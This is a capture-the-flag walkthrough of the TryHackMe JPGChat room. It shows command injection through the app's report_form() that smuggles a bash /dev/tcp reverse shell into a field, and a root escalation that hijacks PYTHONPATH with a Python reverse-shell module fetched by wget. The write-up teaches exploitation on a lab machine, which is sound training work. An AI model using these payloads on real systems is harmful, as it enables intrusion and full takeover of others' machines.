Content:
- Introduction
- Scanning and Enumeration
- Initial Footholds
- Exploitation
- Conclusion
Introduction:
first thing’s first, the logo that in itself explains we are going to deal with some kind of python program or related vulnerability and as the name suggest it is going to be a chatting/messaging application.
According to THM tags the room is an easy boot-to-root machine, that requires initial user flag and final root flag to complete this room.
With this initial info let’s dive in.
Scanning and Enumeration:
As always once we deploy and boot the machine we are provided with an IP address to that machine. Let’s start initial scanning with “nmap” scan and try to figure out what ports are open and services running on them.
$nmap -v -sV -sC [Machine-IP]
NMAP scan comes up with port 22 and port 3000 open running ssh and ppp (JPGChat) service respectively. Port 3000 PPP service is something unique to be enumerated further and could help getting initial footholds, whereas port 22 ssh in common and is of no use as of now.
Further enumeration on port 3000, trying to access through browser/curl in terminal but was enable to interact with the service, finally tried listening to port 3000 using “netcat” and was able to interact.
$nc [Machine-IP] [Port]
In the report section, we got the admin name “Mozzie-jpg” and got to know about the source code available on git-hub thought that welcome message.
Searching on GitHub with the available username, landed on a repository holding JPChat’s source code.
Now here that we are provided with source code which is as expected a python code, started reviewing the code available to get to know how the application is working and obviously to figure out how it can be exploited.
As expected the code has vulnerabilities which can be used to get a shell on the box. While going through the code there was this report_form() function which echos user passed parameters through bash and can be used to execute any other command as well.
Initial Footholds:
Till now it is known that command can be executed on the box through report_form() function.
Let’s get initial shell by passing a bash reverse shell through the function.
$nc [Machine-IP] [Port]
$[REPORT]
$hi;bash -i >& /dev/tcp/{ip}/{port} 0>&1;
Don’t forget to start netcat listener, otherwise will not be able get shell prompted after command execution.
Stabilize the shell obtained using old school and most famous method, python pty shell and exporting TERM to xterm.
$python3 -c “import pty;pty.spawn(`/bin/bash`)”
$export TERM=xterm
Here we got a stable shell and can read initial user flag.
$cat /home/wes/user.txt
Exploitation:
Before moving further with any fancy scripts like linEnum or Linpeas scripts let’s just try to dig out a bit manually.
checking for what sudo commands can this user run.
$sudo -l
Here we found 2 things one is python environment path and the other is a python file which is running as root. moving ahead reading test_module.py file, there is a module/library being imported (compare).
Scratching head for a while on how this can be exploited, env_keep+=PYTHONPATH strikes in.
What here can be done is, we can try is making a compare.py file containing a reverse shell and changing PYTHONPATH to directory containing compare.py file.
import socket,subprocess,os
s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
s.connect((“[IP]”,[PORT]))
os.dup2(s.fileno(),0)
os.dup2(s.fileno(),1)
os.dup2(s.fileno(),2)
import pty; pty.spawn(“/bin/bash”)
Creating compare.py named reverse shell in tmp directory and changing PYTHONPATH to /tmp directory.
Again don’t forget to start netcat listener.
$export PYTHONPATH=/tmp
$wget http://[your-IP]:[PORT]/compare.py
Run /opt/development/test_module.py file with sudo rights, that will pop up root shell.
$ sudo /usr/bin/python3 /opt/development/test_module.py
Conclusion:
The room was an easy box, many things to learn for beginners, making familiar on how misconfigurations lead to exploitation and a bit of code reviewing skills, the way we reviewed chat app code present on git-hub.
- Machine was misconfigured on who can change PYTHON environment path.
- Application vulnerability, the way it was handling user inputs and passing through bash.
Thank you for reading.
I hope it was helpful and made you learn new things. This was my way of solving the box there could be more possible ways.
